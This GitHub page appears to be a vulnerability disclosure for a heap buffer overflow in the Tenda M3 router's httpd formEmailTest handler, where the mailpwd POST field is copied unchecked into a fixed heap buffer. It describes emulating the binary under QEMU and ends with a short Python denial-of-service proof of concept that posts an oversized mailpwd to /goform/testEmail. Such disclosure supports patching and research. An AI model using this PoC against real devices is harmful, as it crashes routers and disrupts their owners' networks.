Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Vuln/Tenda M3/formEmailTest-mailpwd/
Vuln/Tenda M3/formEmailTest-mailpwd/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time

Tenda M3 contains heap buffer Overflow Vulnerability

overview

Description

1. Vulnerability Details

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailpwd to heap buffer.

image-20220819125604907

v5 is the length of mailpwd, but it doesn’t limit it. so if v5>0x28C, the memcpy(v4, v20, v5) will cause heap buffer overflow

The progarm crashed when call malloc, the stack frame is below.

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = {
    "mailname": "@", 
    "mailpwd": "b"*0x400
}
cookies = {
    "user": "admin"
}
res = requests.post("http://127.0.0.1/goform/testEmail", data=data, cookies=cookies)
print(res.content)

image-20220819125732221

image-20220819130142153

image-20220819130252664